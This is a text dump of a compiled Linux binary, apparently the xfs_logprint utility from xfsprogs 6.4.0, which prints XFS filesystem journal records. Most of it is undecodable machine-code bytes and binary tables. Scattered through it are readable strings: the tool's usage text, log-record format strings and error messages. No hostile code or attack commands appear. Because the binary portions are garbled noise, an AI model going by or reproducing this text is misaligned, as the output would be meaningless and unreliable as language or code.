  �   H�5U_  1�L�p�`���   H��1��Ub���?�  ���,  E�^LA�Fx�[  D��E�^PH�D$XE�N1��   E�&gt;E�nA�nD�\$TH�5=U  D�L$@�+`��H��A��A��AUfA��D�L$PH��A�׿   1���a��E�VE�F1�E�NA�n�   H�5U  E�~D�T$`D�L$\D�D$P��_��D�T$`��D��D�L$\D�D$PH�ƿ   1�D�$�ra��McF0Icn(1�Mc~ �   H�5�T  L�D$P�~_��A[A]H��L�D$@H��L���   1��0a��E�~1��   H�5^  �H_��D���   H��1��a��E�FH1��   H�5�T  I�n@M�~8D�D$@�_��H��H��L��D�\$\H�ƿ   1�ASL�L$hD�D$P�`��E�V\E�NZ1�E�FXE�~R�   H�5�T  A�nTD�T$`D�L$\D�D$P�^��D�T$`D����D�L$\D�D$PH�ƿ   1�D�$�X`��A�~A_Xu3E���   �   M�vx1�H�5}T  �`^��D��L��   H��1��`��E�t$E��D��A��  ��&gt;�� �  H��`  Hc�H�&gt;��M�|$E�t$1��   E�d$H�5[U  �]��M��D��   H��D��1��_������A�D$D�y�x���5_��I��H���j  L��1�H��D���I��A�ą�� ���M�FA�n�   1�E�~H�5CU  L�D$@�y]��L�D$@��D��H�ƿ   I�n1��,_���	   �r\��A�v������A�NI�V�   1�L�=v?  L���^���     H��A��E;fsl�MH�U L���   1���^��D�����uѿ
   �\����H�T$��H�D$�xNART��  A���%  H�}Ic�H�\$H���]����A�������
   �[�������Ao$�Ao\$1��   H�54  XI�D$ M�NE�fA�nI�F A��L�L$@�H\��L�L$@E��D��H�Ɖ�1��   �]��E���$  E�������1��   H�5�&gt;  �\��D���   H��1���]����   A9�ANǉ�A�D$H�H��HC H�8�����M�����H��_  1��   H�5�Y  ����   ��(   �j���f�H�@H� H�@     @H�U8H�E8H�PH�H�Ic�H)�H�}$���A�V�J�H��f�� ��   A�UH���   H��H����[��H��H���c  I�E IcE�A�H�=�Q  1����I�FH�D$X����   H�5M=  1���Z��D��   H��1��\��H�C D��A�   H�x�������1�H�5T  �   ���L���Y���   ���(   �`���f�H�@H� H�@     @H�U8H�E8H�H�PH�����(   �(���f�H�@H� H�@     @H�U8H�E8H�H�PH�L�m8A�E�������I�U IcE�8��A�L$���9���  �   H�5XP  1���Y���   H��1��[��D���  E��tD���  E����  E�����A��A�D$A����E��%�  A��=�   �J  =   �  ��@��  H�5�\  H�=�X  1��4���A�L$���9���  �   H�5�O  �M�����A�L$���9���  �   H�5�O  �&amp;�����A�L$���9��B���H�i\  �X  H�5�;  H�=�W  �!Y�����A�L$���9���  �   H�5fO  1��X���   H��1��xZ�������A�L$���9��  �   H�5�W  �M�|$�{���H�5!X  �   1��2Z���F���H�5X  �   1��Z��A�D$�!���H�5�W  �   1��Y��A�D$��1�D��H�\  �   H�58V  ����   �[�1�H�#[  �   H�5�W  �����   �7���A�L$���9���  �   H�5�N  1��W���   H��1��pY��D�Y�  E�����=R�  ���z�Ic�H��HC �pH�8蜱���_��A�L$���9��X  �   H�5eN  덀�A�L$���9��,  �   H�5N  �f���H�C �p(H�x �&lt;����I����W��L�%ہ  �   H�5�N  1���V��H�=a�  L��   H��1��Y���   �UY��� V���8�Y��L�%��  �   H�56@  H��1��V��I��A��L��H�=�  H�¾   1��=Y���   �Y����U���8�GY��L�%@�  �   H�5�O  H���L�%(�  �   H�5�M  �H���H��Y  �/  H�5�8  H�=�J  �XV��H��Y  �r  H�5�8  H�=&amp;U  �9V��H�bY  �j  H�5�8  H�=U  �V��H�CY  �S  H�5~8  H�=�T  �U��H�DY  ��   H�5_8  H�=�T  ��U��H�Y  �%  H�5@8  H�=BI  �U��H��X  �O  H�5!8  H�=RT  �U��H��X  �:  H�58  H�=T  �U��H��X  �H  H�5�7  H�=�S  �`U��H��X  �A  H�5�7  H�=�S  �AU��H�jX  �b  H�5�7  H�=T  �&quot;U��f���AWAVAUATUSH��H��   D�g(�t$H�t$PdH�%(   H��$�   1�H�D$8    ������G  ���!  �   H��H�D$P    �S��H��H����  L�|$@H���   1�M��H������A�����n  H�|$@�X���A�t$�M��H��Hc��   H��A��H�t$X���A�����6  H�|$@� ���A��A9��   Mc�A��L�l$XH�CH�t$XH���  �� H��ҁ� ��   Hc�H9���	  L�t$HH)�D��M��H���1��A������   H�D$HH���tH�D$XH�CH�t$XH�T$XH���  �� H���%@���   Lc�I9��a
  L)�1�H���e��A�������
  E��u`Mc�H���Y��H�l$XI9���  �   H������I��H���l  H����   �  H�L$XA��1�H��H�����A�������H��D�L$���H�5�R  �   1��Ľ��D�L$�   H�5kL  1�D�L$L�%u}  �R��D�D$H��H�=~  L��   1��2U���   �T���D$H�5}R  �   1��a���D�L$�H�l$PH����   �   H�����I��H����   A��l$A����   Mc�L�t$8�+�     H�D$8�8���7  A��I��A�����   M��L��   L��H���g����t�A��L��D�L$����H�5&quot;R  �   1�谼��D�L$���A�   ����H�5�Q  �   1�舼���   H���K��I��H��t�L�D$8L��   1�H������A����u�H�|$8�[�������  �D$    1�C(D�x�D;|$��  Mc�H�l$L�t$8D��M��D�d$�&amp;D  H�D$8�8����  ��I��D9���  M��L��   L��H���a����t����H�xH�D$躌��H�L$D�{8A�ċD$�C4�AȉC,H�yH�L$葌��H�H�L$H�y而��H�CH�CH�L$���   t�Q��@  ʀ��t= �  ��  �   �AD�ȉ�H�  H��	�{(Lc�H�I9���  L���7��L9���  1��   H�5�I  ��O��H��L��   H��L�DP  1��Q���|$���  �
   ��N����}     H�S�Bd��f���  �   H����   �/  �a��I��H���=  L�D$XH���   L��H�����A���  L�|$XA�?����  L��L��H���&quot;���A����  E��@  A�GA�ȨtA�� �  ��  �D$   Ic�H��H��  H��	����I��H����  H�|$`1��    L�|$H�|$�HcD$H�D$ I9��j  H�l$L;d$�3  H�l$X�T$L��L��I��H���&#039;�����  L�|$XA�?����  L��L��H���O�������  E�wH�D$ I��H��H�L$A�E��J�4 I��  I��	D����������  L�T$XH��L��L����������  H�t$L��L��H��A�   �����g  Dt$Mc�M��&amp;����   H�5N  1��M��D�t$�   H��1�D��Mc��uO���
   �L���q{     I9������     H��$�   dH+%(   �,  H��   []A\A]A^A_��2���D$   A� �  I��M���:���A�   �   H�5H  1�D�T$L�%�w  �M��D�D$H���~���I��1��   H�5�F  ��L��H��L���   H��L�*M  1��N���|$�������
   ��K����z     �0���L�|$A�u   L��D�T$����L�����D�T$�T���D���   A�������   H�5�F  1��bL��D��   H��1�� N��H�S���H�l$(I��IcW(I��I9��  I���   H�D$XH�D$ J�, H9��)  H�D$X�T$L��L��I��L��H�D$�������   H�\$XE1�;���$���L��H��L��趷������   D�sIcG(A�E��H��I��  I��	M�$.I9��	  H�|$H���   H�t$XH9�t&#039;)�L�D$H���H��L���T$����T$����  ��D��L��)��	H�T$Hc�HL$X�����u&lt;L�t$XL��H��L���.�����u#H�t$H��L��L��A�   ����������L�|$A���C���H�D$XE)�L��L��D��I��L��H�D$�g����u�D��H�\$X�t$L���	L��Hc�D)�H������u�1�E��LD����L�D$H�L$D��H��L��������7����n���L�����A�u   �����y(   �4�����M��L��H�ߙ�{(Hc�   ����A�����\���H�D$8L��@	 ������5�����H�xA��H�l$H�D$���H�L$D�{8A�ċD$�C4�Aȃ��C,�8���Mc�H)�t$)�L�t$HL��A�O�H��H)�M���1��A��������H�D$HH���������T$M��D��1�����D��D��L��%�  ������A�ωL$���D��H���(��I�������%�  ��������L���S�����H�oN  H�5�I  �   1�����L���,��A�   �B���1�1�H�����A����������H�L$XMc�L��L��L��H��L�l$HH)�H)�����A�����tY������H�D$HI9��f���H�D$X�\���L��1�E1�����x���L�|$A������L�|$L�����L���������H���|��H�5|H  �   1��I���A�   ����H�l$(HcD$L��I)�H�D$ H�l$L;d$}�H�l$X�T$L��L��I��H��������p���L�|$XA�?���)���L��L��H��軳�����H���E�wH�L$ I��H��A�E��J�4!H�L$I��  I��	D���2��������L�T$XH��L��L��臨������H�t$L��L��H��A�   ����������D$D�H�I��)����HG��L��D�T$�[��D�T$������AUI��ATI��U��S��H��H���   dH�%(   H��$�   1�H�t$ �I�����&lt;  �D$8% �  = �  tl1�H�T$�r����*G������   H�D$H��	I�$1�H�ھh  ���G����xr�;�s  `H��$�   dH+%(   ��   H���   []A\A]�H�D$PH�T$�X���H��	I�$1��F��A���   E��x�D$9Js  �}��@s  ��yE���8��H��L�%�p  �   1�H�5}A  H���E��I��M��L��H�=eq  H�¾   1��H���   �;���1�H�T$�`  ���(F����xeH�D$I�$�����E���D���8�uH��L�%np  �   1�H�5�@  H���xE��I��M��L��H�=�p  H�¾   1��H���   ��G��L�%(p  �   H�5�@  1��5E��H�=�p  �   H��L��1���G���   �G��f���ATU��SH���    �iF��H��t�(H�XH�@    H�@    []A\��4D���8�G���   1�H�5@  L�%�o  H���D��H�=)p  A�    I��H��PL��   U1��LG���   �G��f���I��AT��USIP H��1�H��	H���G��H��x[]A\��C���8�(G��L�%!o  �   1�H�5�D  H���+D��I��I��L��H�=�o  H�¾   1���F���   �F��f���UH��H�=�D  ��B��H��t	D�EE��u	H��]��B��H�MH�=Jo  H��?  1��   �wF����D  ��AWM��D����  �AVAUATI��UL��S��H��(  �|$dH�%(   H��$  1����  DIȉȁ�  ��A�������$A9���  �&lt;$I�?�  H����  �$;E ��  �$�E M�/����   Hc�L�t$�   L��H�  M��H��	��?�D$@ �|$�   L���wC��H����  �5�n  ����   �$��9��X  H�=�?  �VB��D�l$�   1�H�5qC  �B��AͿ   D��H��1��ID���+n  ����  �D$��   A��H��H=  u�I�$��H��  9,$�M���1�H��$  dH+%(   �  H��(  []A\A]A^A_�M�,$�   H�5�$  1���A���   H��L��1��C����m  ���h���M��E1��1 A�U �   1�A��H�5!  I���yC��A��t&#039;A���   t1A��u�D��H�5�   �   1��NC��봿
   �@��A���   uϿ
   �@�����H�=3&gt;  �@��D�l$�   1�H�5B  �6A��AͿ   D��H��1���B����l  ��������   H�51&quot;  1�� A���   H��1��B���D$A�Ņ�u7�
   �?���l����   H�5�!  1�A�@   �@���   H��1��B��Icŉl$E1�L��L�5�!  M��I��H��f�B�L�D��L���   1�I����CB��I9�u޿
   L��M��I��l$�w?������$�p�i�  Hc���A��I�H������L�%k  �   H�5�&lt;  1��@��H�=�k  �   H��L��1��B���   �B��D  L�%�j  �   H�5�&quot;  1���?���   H��L��1��A��H�=  �h?���   �{���H�L�-�  D�L$L��L�p��C?���   H�5�;  1��?��D�$�L$L��H�ƿ   1��6A��L���?���=(k  ������1��   H�5�;  �=?��H��1��3���&gt;&gt;��I�    1��E    ����$?��@ ��H��H��H�5�?  1�Hɿ   A��H�� �@�� ��H��H���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 Usage: %s [options...] &lt;device&gt;

Options:
    -c	            try to continue if error found in log
    -C &lt;filename&gt;   copy the log from the filesystem to filename
    -d	            dump the log in log-record format
    -e	            exit when an error is found in the log
    -f	            specified device is actually a file
    -l &lt;device&gt;     filename of external log
    -n	            don&#039;t try and interpret log data
    -o	            print buffer data in hex
    -s &lt;start blk&gt;  block # to start printing
    -v              print &quot;overwrite&quot; data
    -t	            print out transactional view
	-b          in transactional view, extract buffer info
	-i          in transactional view, extract inode info
	-q          in transactional view, extract quota info
    -D              print only data; no decoding
    -V              print version information
   Oper (%d): tid: %x  len: %d  clientid: %s       (len - sizeof(struct_size)) % sizeof(int) == 0  #regs: %d   start blkno: %lld (0x%llx)  len: %d  bmap size: %d  flags: 0x%x
    #regs: %d   Not printing rest of data
  seq#: %d  len: %d  cnt: %d  root: %d
   level: %d  free#: 0x%x  newino: 0x%x
   1st: %d  last: %d  cnt: %d  freeblks: %d  longest: %d
  ver: %d  flags: 0x%x  id: %d  
 blk limits  hard: %llu  soft: %llu
     blk  count: %llu  warns: %d  timer: %d
 ino limits  hard: %llu  soft: %llu
     ino  count: %llu  warns: %d  timer: %d
 #regs: %d   ino: 0x%llx  flags: 0x%x   dsize: %d
               blkno: %lld  len: %d  boff: %d
 INODE: #regs: %d   Not printing rest of data
   magic 0x%hx mode 0%ho version %d format %d
     atime 0x%llx mtime 0x%llx ctime 0x%llx
 size 0x%llx nblocks 0x%llx extsize 0x%x nextents 0x%llx
        naextents 0x%llx forkoff %d dmevmask 0x%x dmstate 0x%hx
        flags2 0x%llx cowextsize 0x%x
  (f-&gt;ilf_size == 3) || (f-&gt;ilf_fields &amp; (0x040 | 0x080 | 0x100)) (f-&gt;ilf_fields &amp; (0x002 | 0x004 | 0x008)) == 0  (f-&gt;ilf_fields &amp; (0x040 | 0x080 | 0x100)) == 0  length of Log Record: %d	prev offset: %d		num ops: %d
  **********************************************************************  * ERROR: header cycle=%-11d block=%-21lld        *
     * ERROR: data block=%-21lld                             *
      %s: xlog_print_record: malloc failed
   %s: xlog_print_record: read error
      ----------------------------------------------------------------------------       Not enough data to decode further
   ICR: split header, not printing
          blkno: %lld  len: %d  boff: %d
       DQUOT: #regs: %d   Not printing rest of data
   ((__builtin_constant_p((__u32)(( __u32)(__be32)(head-&gt;oh_len))) ? ((__u32)( (((__u32)((( __u32)(__be32)(head-&gt;oh_len))) &amp; (__u32)0x000000ffUL) &lt;&lt; 24) | (((__u32)((( __u32)(__be32)(head-&gt;oh_len))) &amp; (__u32)0x0000ff00UL) &lt;&lt; 8) | (((__u32)((( __u32)(__be32)(head-&gt;oh_len))) &amp; (__u32)0x00ff0000UL) &gt;&gt; 8) | (((__u32)((( __u32)(__be32)(head-&gt;oh_len))) &amp; (__u32)0xff000000UL) &gt;&gt; 24) )) : __fswab32((( __u32)(__be32)(head-&gt;oh_len))))) == sizeof(struct xfs_disk_dquot)     %s: xlog_print_trans_efi: malloc failed
        EFI: Not enough data to decode further
 EFI:  #regs: %d	num_extents: %d  id: 0x%llx
    EFI free extent data skipped (CONTINUE set, no space)
  EFD:  #regs: %d	num_extents: %d  id: 0x%llx
    EFD: Not enough data to decode further
 %s: bad size of attri format: %u; expected %u
  %s: xlog_print_trans_attri: malloc failed
      ATTRI:  #regs: %d	name_len: %d, value_len: %d  id: 0x%llx
      ATTRD: Not enough data to decode further
       QOFF:  #regs: %d    flags: 0x%x
        QOFF: Not enough data to decode further
        %s: unknown log operation type (%x)
    Left over region from split log item
   DQUOT: magic 0x%hx flags 0%ho
  ICR:  #ag: %d  agbno: 0x%x  len: %d
      cnt: %d  isize: %d    gen: 0x%x
      %s: problem finding oldest LR
  ============================================================================    * ERROR: found data after zeroed blocks block=%-21lld  *
       Bad log - data after zeroed blocks      %s: skipped %d cleared blocks in range: %lld - %lld
    %s: skipped %d zeroed blocks in range: %lld - %lld
     %s: can&#039;t get size for data subvolume
  %s: can&#039;t get size for log subvolume
   %s: can&#039;t get size for realtime subvolume
          read of XFS superblock failed
          external log device not specified

 ddev write fail requires a parameter
   logdev write fail requires a parameter
 rtdev write fail requires a parameter
  %s: bad buftarg reinit, ldev mismatch
  %s: bad buftarg reinit, logdev
 %s: bad buftarg reinit, rtdev
  %s: physical end of log at %lld
        %6lld HEADER Cycle %d tail %d:%06d len %6d ops %d
      [%05lld - %05lld] Cycle 0x%08x New Cycle 0x%08x
        Could not allocate btree cursor caches.
        Could not allocate defer init item caches.
     BUF:  #regs:%d   start blkno:0x%llx   len:%d   bmap size:%d   flags:0x%x
                     icount:%llu ifree:%llu    seq#:%d  len:%d  cnt:%d  root:%d
       		level:%d  free#:0x%x  newino:0x%x
    		1st:%d  last:%d  cnt:%d  freeblks:%d  longest:%d
 ERROR LOG TRANS START  COMMIT  WAS_CONT  UNMOUNT  CONTINUE  END  none flags:  log_misc.c f-&gt;blf_type == 0x123c BUF:   len &gt;= 4 SUPER BLOCK Buffer:  Out of space
 out of space
 ver: %d   AGI unlinked data skipped  (CONTINUE set, no space)
 bucket[%d - %d]:  0x%x  ver: %d  seq#: %d  len: %d  
 root BNO: %d  CNT: %d
 level BNO: %d  CNT: %d
 %2x  %8x  icount: %llu  ifree: %llu   fdblks: %llu  frext: %llu
 DQUOT Buffer: DQ   AGF Buffer: XAGF   AGI Buffer: XAGI   INODE:  INODE CORE
 nlink %u uid %d gid %d
 flags 0x%x gen 0x%x
 UUID inode: no extra region
 f-&gt;ilf_size &lt;= 4 EXTENTS inode data
 BTREE inode data
 LOCAL inode data
 SHORTFORM DIRECTORY size %d
 EXTENTS attr data
 BTREE attr data
 LOCAL attr data
 skip_count == 0 Header 0x%x wanted 0x%x
 cycle: %d	version: %d	 	lsn 	tail_lsn cycle num overwrites:  %d - 0x%x   unknown
 little endian linux
 big endian linux
 big endian irix
 ? (%d)
 h_size: %d
 uuid: %s   format:  Bad log record header Bad data in log %08x  %02x %.*s
 xhdrs != ((void *)0) 0x%02x  %c%c%c%c:      tid: %x  num_items: %d
 #regs: %d   id: 0x%x (s: 0x%llx, l: %d)  ATTRI:  name len:%u
 ATTRD:  #regs: %d	id: 0x%llx
 Unmount filesystem
 ATTRI:  value len:%u
 log_print_all.c last_half_cycle != 0 %s: physical end of log
 BLKNO: %lld
 %s: after %d zeroed blocks
 illegal value %s: totally cleared log
 %s: totally zeroed log
 xlog_find_head: bad read %s: logical end of log
 /usr/share/locale xfsprogs %s version %s
 6.4.0 bC:cdefl:iqnors:tDVv xfs_logprint:
 xfs_buffer xfs_inode xfs_ifork xfs_inode_log_item xfs_buf_log_item xfs_defer_pending xfs_rmap_intent xfs_refc_intent xfs_bmap_intent xfs_extfree_intent xfs_attr_intent xfs_da_state xfs_bnobt_cur xfs_inobt_cur xfs_bmbt_cur xfs_rmapbt_cur xfs_refcbt_cur xfs_extfree_item xfs_trans     Can&#039;t open device %s: %s
 Can&#039;t open file %s: %s
 LIBXFS_DEBUG_WRITE_CRASH unknown write fail type %s
 %s: bad buftarg reinit, ddev
     data device: 0x%llx
     log file: &quot;%s&quot;      log device: 0x%llx  daddr: %lld length: %lld

 logprint.c x.logBBsize &lt;= 0x7fffffff %s: read error (%lld): %s
 open %s: short read? (%lld)
 %s: write error (%lld): %s
 %s: short write? (%lld)
 	SUPER Block Buffer:
 fdblks:%llu  frext:%llu
 		sunit:%u  swidth:%u
 	AGI Buffer: (XAGI)
 		ver:%d   	AGF Buffer: (XAGF)
 		ver:%d  seq#:%d  len:%d  
 		root BNO:%d  CNT:%d
 		level BNO:%d  CNT:%d
 	DQUOT Buffer:
 		UIDs 0x%lx-0x%lx
 	BUF DATA
 ddev logdev rtdev libxfs              �a��?a�� \�� \�� \��!a��a���_��J_��T^��C^��5^��$^��^��^���]��&#039;]���\�����t��y��y��y��y��y��y��y��y��y��y��y��y��y��y��y��y��y��A��y��y��y��y��y��y��y��y��y��y��y��5��&amp;���������y��y�����y��y�����y��������y�����y��������y��~��        xlog_recover_print_buffer       xlog_print_trans_dquot          xlog_print_record               xlog_print_find_oldest          xlog_print_trans_inode          xlog_print_trans_buffer xfs_log_dump    xfs_log_copy main       %s: malloc failed (%d bytes): %s
       %s: %s - cannot set blocksize %d on block device %s: %s
        %lx: Badness in key lookup (length)
bp=(bno 0x%llx, len %u bytes) key=(bno 0x%llx, len %u bytes)
       %s: %s can&#039;t memalign %u bytes: %s
     %s: cache alloc failed (%s, %d bytes): %s
      found dirty buffer (bulk) on free list!
        %s: %s invalid map %p or nmaps %d
      %s: %s map blkno 0x%llx doesn&#039;t match key 0x%llx
       %s: %s can&#039;t malloc %u bytes: %s
       %s: Releasing dirty buffer to free list!
       %s: unrecognised log version (%d).      * ERROR: mismatched uuid in log
*            SB : %s
*            log: %s
      %s: %s possibly contains a mounted filesystem
  %s: %s contains a mounted and writable filesystem
      %s: %s contains a mounted filesystem
   %s: error - pwrite only %d of %d bytes
 %s: bad size of efi format: %u; expected %u or %u; nextents = %u
       RUI: Not enough data to decode further
 RUI:  #regs: %d	num_extents: %d  id: 0x%llx
    %s: bad size of RUI format: %u; expected %u; nextents = %u
     RUI extent data skipped (CONTINUE set, no space)
       (s: 0x%llx, l: %d, own: %lld, off: %llu, f: 0x%x)       RUD:  #regs: %d	                 id: 0x%llx
    RUD: Not enough data to decode further
 CUI: Not enough data to decode further
 CUI:  #regs: %d	num_extents: %d  id: 0x%llx
    %s: bad size of CUI format: %u; expected %u; nextents = %u
     CUI extent data skipped (CONTINUE set, no space)
       CUD:  #regs: %d	                 id: 0x%llx
    CUD: Not enough data to decode further
 BUI: Not enough data to decode further
 BUI:  #regs: %d	num_extents: %d  id: 0x%llx
    %s: bad size of BUI format: %u; expected %u; nextents = %u
     BUI extent data skipped (CONTINUE set, no space)
       BUD:  #regs: %d	                 id: 0x%llx
    BUD: Not enough data to decode further
 %s: %s: device %lld is not open
        %s: write verifier failed on %s bno 0x%llx/0x%x
        %s: write failed on %s bno 0x%llx/0x%x, err=%d
 %s: error - read only %d of %d bytes
   Invalid block length (0x%x) for buffer  %s: device %lld is already open
        %s: %s: too many open devices
  %s: flush of device %lld failed, err=%d %s: node put on refcount %u (node=%p)
  %s: node put on node (%p) in MRU list
  Log inconsistent (didn&#039;t find previous header)  Log inconsistent or not a log (last==0, first!=1)       * ERROR: bad magic number in log header: 0x%x
  * ERROR: log format incompatible (log=%d, ours=%d)
     TRANS: tid:0x%x  #items:%d  trans:0x%x  q:0x%lx
        	ICR:  #ag: %d  agbno: 0x%x  len: %d
	      cnt: %d  isize: %d    gen: 0x%x
    item-&gt;ri_buf[0].i_len == sizeof(struct xfs_inode_log_format_32) || item-&gt;ri_buf[0].i_len == sizeof(struct xfs_inode_log_format) 	INODE: #regs:%d   ino:0x%llx  flags:0x%x   dsize:%d
   item-&gt;ri_buf[1].i_len == __builtin_offsetof (struct xfs_log_dinode, di_next_unlinked) || item-&gt;ri_buf[1].i_len == sizeof(struct xfs_log_dinode) 		magic:%c%c  mode:0x%x  ver:%d  format:%d
     		uid:%d  gid:%d  nlink:%d projid:0x%04x%04x
   		atime:%lld  mtime:%lld  ctime:%lld
   		size:0x%llx  nblks:0x%llx  exsize:%d  nextents:%lu  anextents:%u
     		forkoff:%d  dmevmask:0x%x  dmstate:%d  flags:0x%x  gen:%u
    		flags2 0x%llx cowextsize 0x%x
        		DATA FORK EXTENTS inode data:
        		DATA FORK BTREE inode data:
  		DATA FORK LOCAL inode data:
  		UUID inode: no extra region
  xlog_print_trans_inode: illegal inode type      		ATTR FORK EXTENTS inode data:
        		ATTR FORK BTREE inode data:
  		ATTR FORK LOCAL inode data:
  	EFD:  #regs: %d	num_extents: %d  id: 0x%llx
   %s: xlog_recover_print_efi: malloc failed
      	EFI:  #regs:%d	num_extents:%d  id:0x%llx
      	ATTRD:  #regs: %d	id: 0x%llx
  %s: xlog_recover_print_attri: malloc failed
    	DQUOT: #regs:%d  blkno:%lld  boffset:%u id: %d
        		magic 0x%x	version 0x%x	ID 0x%x (%d)	
        		blk_hard 0x%x	blk_soft 0x%x	ino_hard 0x%x	ino_soft 0x%x
      		bcount 0x%x (%d) icount 0x%x (%d)
    xlog_recover_print_logitem: illegal type
       %s: realloc failed (%d bytes): %s
      bad number of regions (%d) in inode log format  
LOG REC AT LSN cycle %d block %d (0x%x, 0x%x)
 %s: failed to find head and tail, error: %d
        log tail: %lld head: %lld state: %s
        Superblock has unknown incompatible log features (0x%x) enabled.
Output may be incomplete or inaccurate. It is recommended that you
upgrade your xfsprogs installation to match the filesystem features.
       %s: failed in xfs_do_recovery_pass, error: %d
  %s: cannot stat the device file &quot;%s&quot;: %s
       %s: can&#039;t determine device size
        %s: warning - cannot get sector size from block device %s: %s
  %s: cache init failed (%s, %d bytes): %s
       cache %s freed with %d items allocated
 * ERROR: for header block=%lld
*        not enough hdrs for data length, required num = %d, hdr num = %d
       Not enough headers for data length.     %s: xlog_print: malloc failed for ext hdrs
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ error warning /proc/mounts /etc/mtab autofs ro %s: pwrite failed: %s
 %s: %s: malloc failed
 (s: 0x%llx, l: %d, f: 0x%x)  (unknown) %s: read failed: %s
 %s: cannot open %s: %s
 %s: cannot stat %s: %s
 %s: buftarg init failed
 Bad log %s: bad clientid 0x%x %s: bad length 0x%x BUF ICR INO EFD EFI ATTRD ATTRI RUD RUI CUD CUI BUD BUI DQ  QOFF %s: illegal type : cnt:%d total:%d  a:0x%lx len:%d  	CORE inode:
 		flushiter:%d
 f-&gt;ilf_size == 3 + hasattr f-&gt;ilf_size == 2 + hasattr 		DEV inode: no extra region
 f-&gt;ilf_size == 3 + hasdata %s: illegal inode log flag f-&gt;qlf_len == 1 		btimer 0x%x itimer 0x%x 
 	QUOTAOFF: #regs:%d   type:  USER  GROUP  PROJECT %s: Unmount LR %s: bad transaction %s: bad header magic number %s: bad flag 0x%x totally zeroed log empty log check failed failed to find log head &lt;CLEAN&gt;     override tail: %d
 &lt;DIRTY&gt; failed to locate log tail %s: couldn&#039;t find sync record %s: lseek to %lld failed: %s
 LIBXFS_LEAK_CHECK extended-header: cycle: %d
 %s: %u,%u             ���������0�������0���0���0���a���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���0���=���=������o�������=���������������ݔ����������������������������������������������������������������������������������������������������������ȕ��ȕ��ȕ������r���Z���B���*������������ʗ��������������j���ǟ������p���p���p�������������A���ř����������z���a���H���/���������B���=������=����=���=���=���F���=���=���=���=���=���=���=�������=���=���=���=���=���=���=���=���=���=���=���=���=���=���=���x���    xlog_recover_add_to_trans       xlog_recover_print_inode        xlog_recover_print_inode        xlog_recover_print_dquot        xlog_recover_print_item         xlog_recover_unmount_trans      xlog_recover_process_data       xlog_valid_rec_header   libxfs_bwrite           libxfs_initbuf_map              libxfs_getbufr_map      cache_node_put  __initbuf               libxfs_device_close             libxfs_device_open              libxfs_device_to_fd             xlog_print_trans_bui            xlog_print_trans_cui            xlog_print_trans_rui    xlog_find_tail  ;&lt;  F   ���p  �����  ���  h��X  X���  ����  ���  x(��t  x2���  �5��  86��P  �6��|  �6���  �6���  �7���  XJ��T  �T��  xU��T  h[���  �[���  h\���  �\��  �]��l  X^���  �_��  �a��\  �c���  �d��	  �e��&lt;	  �e��P	  �f��l	  �f���	  xg���	  8h��
  xj��h
  8k���
  Xl��  �n��t  �o���  �q��  �r��D  u���  �u���  xv��  �x��x  �x���  8z���  �z��$  �{��\  x~���  ����  (���(  ȁ��d  X����  x����  (���(  ����t  �����  �����  ����$  ����p  h����  8����  ����,  x���|  �����  ����  ����  ��4  �����             zR x�        ��&amp;    D    $   4   ��p   FJw� ?:*3$&quot;       \   ��`             t   ���?    B�  8   �   ����   B�B�D �H(�DP�
(F ABBK l   �   ����
   B�B�E �B(�A0�D8�N���J�b�A��
8A0A(B BBBD��X�N�A�L   8  �$���	   B�E�B �E(�D0�A8�J�R
8D0A(B BBBD   L   �  �.��0   B�B�B �B(�A0�A8�D��
8D0A(B BBBA   8   �  �1���    B�B�D �H(�J0S
(A ABBE (     �1��n    B�D�N @
ABI    @  $2��          T   2��       L   h  ,2��   F�B�E �D(�A0��
(D LGDLT
(F BBBH \   �  �2��e   B�B�E �I(�H0�D8�G�
8A0A(B BBBK)�E�R�A� t     �D��o
   B�B�B �E(�D0�A8�G�j�K�A�B�^���J�A�B�\�
8A0A(B BBBAD   �  ���~   F�G�B �I(�D0�C8�Q���G�V�A�   &lt;   �  �N���    Q�I�I �D(�D0�U�(F� B�B�B� h     O���   F�B�B �B(�A0�A8�Dp\xH�qxHp�
8A0A(B BBBG�xX�NxAp      �  �T��6          �  �T���       (   �  xU��h    B�A�A �N
ABAT   �  �U���    B�I�L �G(�F0�A8�DPM
8D0A(B BBBAbXI`XXAP D   0  4V���    F�B�G �A(�D@U
(D ABBFbHAPKHA@ P   x  �V���   B�B�A �F(�R@�
(A ABBDe
(A ABBE�HIPP   �  �W���   B�B�D �H(�G0�
(D ABBBa
(D ABBF�8G@`      TY���   F�B�B �B(�A0�A8�D@�
8D0A(B BBBIRHHP]@e
HHPB~HIPH   �  �Z��   F�B�B �A(�A0��
(D BBBHD(A EBB,   �  �[���    B�A�A �Y
ABH         D\��            P\���    G��
A   0  ]��f    tc H   H  l]��w    F�B�B �A(�A0�L
(D BBBFD(A EBB@   �  �]���    B�B�F �H(�G0�M��
0A(A BBBAP   �  ^��&gt;   B�B�B �B(�A0�A8�G� L�#*
8D0A(B BBBA   8   ,  `���    B�D�D �S
ABHJ
ADA   h   h  �`��   I�I�B �A(�P0�|8G@Z8F0A
(A BBBHT
(C BBBKK(C BBB  `   �  @a��V   F�E�E �B(�G0�A8�DP�Xc`HXAPT
8D0A(B BBBBwXX`LXFP8   8	  &lt;c���    F�L�A �D(�FP{
(A ABBB T   t	  �c��F   F�E�E �B(�G0�A8�DP�Xc`HXAPT
8D0A(B BBBB 8   �	  �e���    F�L�A �D(�FP{
(A ABBB `   
  \f��V   F�E�E �B(�G0�A8�DP�Xc`HXAPT
8D0A(B BBBBwXX`LXFP8   l
  Xh���    F�L�A �D(�FP{
(A ABBB $   �
  �h���    F�J�J tABh   �
  di��R   B�B�B �A(�D0�
8L@Z8A0G
(A BBBF�8L@Z8G0A
(A BBBA      &lt;  Xk��       H   P  dk��&gt;   B�B�E �H(�E0�D8�GPK
8A0A(B BBBJ H   �  Xl���    B�B�A �A(�D0�
(A ABBG\(A ABB  4   �  �l���    B�C�D �U
ABGLAB L      Tm���   F�B�G �H(�A0�C8�G��
8D0A(B BBBA   &lt;   p  �o��   F�I�D �A(�J�
(D ABBE   8   �  q��#   F�E�D �D(�I�Y
(D ABBA8   �  �q���    F�E�A �I(�G0{
